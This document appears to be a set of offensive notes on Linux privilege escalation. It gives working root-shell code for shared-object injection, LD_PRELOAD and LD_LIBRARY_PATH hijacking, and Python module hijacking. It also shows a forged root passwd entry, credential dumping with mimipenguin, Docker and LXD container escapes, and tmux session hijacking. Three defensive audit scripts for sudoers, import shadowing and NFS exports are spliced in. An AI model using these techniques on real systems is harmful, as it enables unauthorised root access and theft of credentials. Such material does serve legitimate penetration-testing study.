Linux Privilege Escalation
Enumeration
Manual
Enumerate kernel version
uname -a
Enumerate services
netstat -anlp
netstat -ano
Enumerate shells
cat /etc/shells
Enumerate backups
Enumerate DBs
find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null
GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. The project collects legitimate
https://gtfobins.github.io/
Automated
LinEnum
LinPeas
./linpeas.sh -e
https://github.com/luke-goddard/enumy
https://github.com/sleventyeleven/linuxprivchecker
Exploitation
Kernel Version Exploits
Search For Exploit For Kernel Version
./linux-exploit-suggester.sh -k 5.1.0
searchsploit
GitHub search
Weak permissions
Can read /etc/shadow
hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/
Can edit executables that run with sudo rights, whether located in $PATH or in any other directory
MySQL : phpconfig
Process Dump
https://github.com/huntergregal/mimipenguin
./mimipenguin.sh
Locate Process
Using gcore
Using procdump
/dev/mem Search
/dev/mem provides access to the system's physical memory, not the virtual memory
Docker PE Exploitation
Through Docker we can mount host system files into an image, run the image and edit its files [image files + host system files].
Edit these mounted files [/etc/shadow], because you are root inside the Linux container.
nano /etc/passwd
LXD PE Exploitation
You will build an Alpine image on the attacker machine with lxd-alpine-builder (GitHub) and transfer it.
Use any file transfer technique to transfer this file to the victim machine.
On the victim machine run this to mount host files in the LXD Alpine container:
lxd init
#hit enter for all
lxc list
Now you are root in this container [you can edit|show any file, like /etc/shadow mounted from the host]
cd /mnt/hacked
cat /etc/shadow
Binaries Exploitation
These techniques apply to SUID/SGID binaries.
Executables can be
file.sh
file.AppImage
1- PATH manipulation
Technique where you add a new directory to the PATH that the system searches for executables.
2- Object Injection
First, what are .so files?
First find the shared object the binary loads and locate its path.
#include <stdlib.h>
// shell_spawner.c: the constructor attribute makes inject() run when the library is loaded
void inject() __attribute__((constructor));
void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash");
}
Compile shell_spawner.c to a .so file with the same name and path as the targeted shared object.
Check line
Defaults env_reset
#this means reset the environment variable values before executing any command as sudo
Defaults env_keep+=LD_PRELOAD
#this means don't reset the environment variable LD_PRELOAD value
Libraries [code blocks whose functions developers use to ease coding] are files with the .so extension, called (loaded in RAM) when a compiled C program that needs them is executed.
Making Malicious_lib.so
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid / setuid */
// _init runs when the library is loaded (built with -nostartfiles so it replaces the default init)
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
cd /tmp
gcc -fPIC -shared -o Malicious_lib.so Malicious_lib.c -nostartfiles
sudo LD_PRELOAD=/tmp/Malicious_lib.so <COMMAND> #Use any command you are allowed to run with sudo; the full path is needed because the loader does not search the current directory
Check line
Defaults env_reset
#this means reset the environment variable values before executing any command as sudo
Defaults env_keep+=LD_LIBRARY_PATH
#this means don't reset the environment variable LD_LIBRARY_PATH value
ldd /command_path
#define _GNU_SOURCE   /* setresuid */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
//lib.c file: the constructor attribute makes hijack() run when the library is loaded
static void hijack() __attribute__((constructor));
void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
cd /newpath
gcc -o /tmp/lib.so -shared -fPIC /newpath/lib.c
spawn a shell
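The LD_PRELOAD and LD_LIBRARY_PATH sections above both come down to one sudoers setting: env_reset is on, but env_keep lets a loader variable through. The following script is an added example (not from these notes) that audits sudoers text for exactly that; the sudoers content it ships with is constructed, and the real file normally needs root to read.

```python
"""Audit sudoers text for the env_keep misconfiguration described above.
Added example (not from the original notes): parses the Defaults lines
and reports whether LD_PRELOAD or LD_LIBRARY_PATH survive env_reset."""
import re
import sys

# Constructed sample sudoers content (not a real host's file)
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults        env_keep += "LD_PRELOAD"
Defaults        env_keep+=LD_LIBRARY_PATH
Defaults        env_keep += "LANG LC_ALL"   # harmless locale variables
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
"""

# Variables that let the calling user inject code into a sudo'ed command
DANGEROUS_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

# Defaults[:user|@host|!cmd] ... env_keep [+|-]= "VAR VAR ..."
_ENV_KEEP = re.compile(r'^\s*Defaults\b[^#]*?\benv_keep\s*([+-]?)=\s*"?([^"#]*)"?')
# Defaults ... env_reset  (or !env_reset, which disables it)
_ENV_RESET = re.compile(r'^\s*Defaults\b[^#]*?\s(!?)env_reset\b')


def audit_sudoers(text):
    """Return (env_reset_enabled, sorted dangerous vars kept by env_keep)."""
    env_reset = False
    kept = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()  # drop trailing comments
        if not line:
            continue
        m = _ENV_RESET.match(line)
        if m:
            env_reset = m.group(1) != "!"
        m = _ENV_KEEP.match(line)
        if not m:
            continue
        op, names = m.group(1), m.group(2).split()
        if op == "+":
            kept.update(names)
        elif op == "-":
            kept.difference_update(names)
        else:                       # plain '=' replaces the whole list
            kept = set(names)
    return env_reset, sorted(kept & DANGEROUS_VARS)


def report(text):
    """Human-readable findings for one sudoers file."""
    env_reset, bad = audit_sudoers(text)
    lines = []
    if not env_reset:
        lines.append("env_reset is not enabled: the caller's environment reaches sudo'ed commands")
    for var in bad:
        lines.append(f"env_keep preserves {var}: remove it from env_keep in /etc/sudoers")
    return lines or ["no LD_PRELOAD/LD_LIBRARY_PATH exposure via env_keep found"]


if __name__ == "__main__":
    # Pass a sudoers path (root needed to read the real one) or run on the sample
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SUDOERS
    print("\n".join(report(text)))
```

The parser honours the three env_keep operators sudoers supports (`+=` adds, `-=` removes, `=` replaces the list) and the `!env_reset` negation, so a file that adds LD_PRELOAD and later removes it is reported as clean. Files pulled in via `#include`/`@include` are not followed; run the script on each of them.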
As explained in the image, we go to the file's directory and find the modules called by the Python code:
cd /home/sofs/script/
cat vip.py
#vip.py
import os
import zipfile
if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', '
    zipdir('/var/www/html', zipf)
    zipf.close()
We will create a new file with the same name as a called module in the same directory (Python searches the script's own directory before the standard library):
nano zipfile.py
import pty
pty.spawn("/bin/sh")
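The module hijack above works because Python puts the script's own directory at the front of sys.path, so a zipfile.py placed next to vip.py wins over the standard library. The script below is an added example (not from these notes) that checks a script for this exposure from the defender's side: which imports could be shadowed, whether a shadowing file already exists beside the script, and whether the directory is writable by group or others. The vip.py stand-in and the temporary directory it builds are constructed for the demo.

```python
"""Check whether a Python script's imports could be shadowed by a file in
the script's own directory (Python puts that directory first on sys.path).
Added example, not from the original notes; paths are constructed."""
import ast
import os
import stat
import tempfile

# Constructed stand-in for the vip.py shown above (the zipdir helper is not needed here)
SAMPLE_SCRIPT = """\
import os
import zipfile
from shutil import copy
"""


def imported_modules(source):
    """Top-level names of every module the script imports, found via the AST."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def shadow_risks(script_path):
    """For each import of script_path: is a same-named module already sitting
    beside the script, and is the directory writable by group/others so that
    someone could drop one there."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path) as f:
        mods = imported_modules(f.read())
    mode = os.stat(script_dir).st_mode
    writable_by_others = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
    report = {}
    for mod in mods:
        as_file = os.path.join(script_dir, mod + ".py")
        as_pkg = os.path.join(script_dir, mod, "__init__.py")
        report[mod] = {
            "shadowed": os.path.exists(as_file) or os.path.exists(as_pkg),
            "dir_writable_by_others": writable_by_others,
        }
    return report


def demo():
    """Build a throwaway directory that reproduces the misconfiguration."""
    d = tempfile.mkdtemp()
    os.chmod(d, 0o777)                       # world-writable script directory
    script = os.path.join(d, "vip.py")
    with open(script, "w") as f:
        f.write(SAMPLE_SCRIPT)
    with open(os.path.join(d, "zipfile.py"), "w") as f:
        f.write("# constructed stand-in that would shadow the stdlib zipfile\n")
    return shadow_risks(script)


if __name__ == "__main__":
    for mod, info in demo().items():
        print(mod, info)
```

A script run by root or by cron from a directory that other users can write to is the case worth fixing: either move the script to a root-owned directory with mode 755, or run it with `python3 -I` (isolated mode), which keeps the script directory off sys.path.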
searchsploit
GTFOBins
After reading the executable with strings or cat, you find that it calls another executable by full path.
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.
/tmp/rootshell -p
What is root_squash?
By default NFS applies root_squash: files written to a share on the local machine are created with the permissions the (squashed) remote user has, rather than root's.
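The setting that matters for root_squash lives in /etc/exports, per share and per client. As an added example (not from these notes), the following script parses exports text and lists every (path, client) pair exported with no_root_squash; the exports content is constructed for the demo.

```python
"""Parse /etc/exports text and flag shares exported with no_root_squash.
Added example (not from the original notes); the exports content is constructed."""
import re
import sys

SAMPLE_EXPORTS = """\
# constructed /etc/exports
/srv/share     *(rw,sync,no_subtree_check)
/srv/backup    10.0.0.0/24(rw,sync,no_root_squash)
/srv/public    192.168.1.5(ro) *(rw,no_root_squash,insecure)
/srv/plain     10.0.0.7
"""

# client(opt,opt,...) or a bare client that takes the default options
_CLIENT = re.compile(r'(\S+?)\(([^)]*)\)|(\S+)')


def parse_exports(text):
    """Return (path, client, [options]) for every client spec in the file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)          # paths containing spaces are not handled
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else ""
        for m in _CLIENT.finditer(rest):
            if m.group(1) is not None:
                opts = [o.strip() for o in m.group(2).split(",") if o.strip()]
                entries.append((path, m.group(1), opts))
            else:
                entries.append((path, m.group(3), []))   # defaults: ro, root_squash
    return entries


def risky_exports(text):
    """(path, client) pairs where root on the client keeps root on the share."""
    return [(p, c) for p, c, opts in parse_exports(text) if "no_root_squash" in opts]


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORTS
    for path, client in risky_exports(text):
        print(f"{path} exported to {client} with no_root_squash")
```

A bare client with no option list keeps the NFS defaults (read-only, root squashed), so it is never flagged; a wildcard client combined with no_root_squash, as on the /srv/public line, is the combination to remove first.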
screen -ls
tmux ls
Session hijacking (attach to an existing screen/tmux session)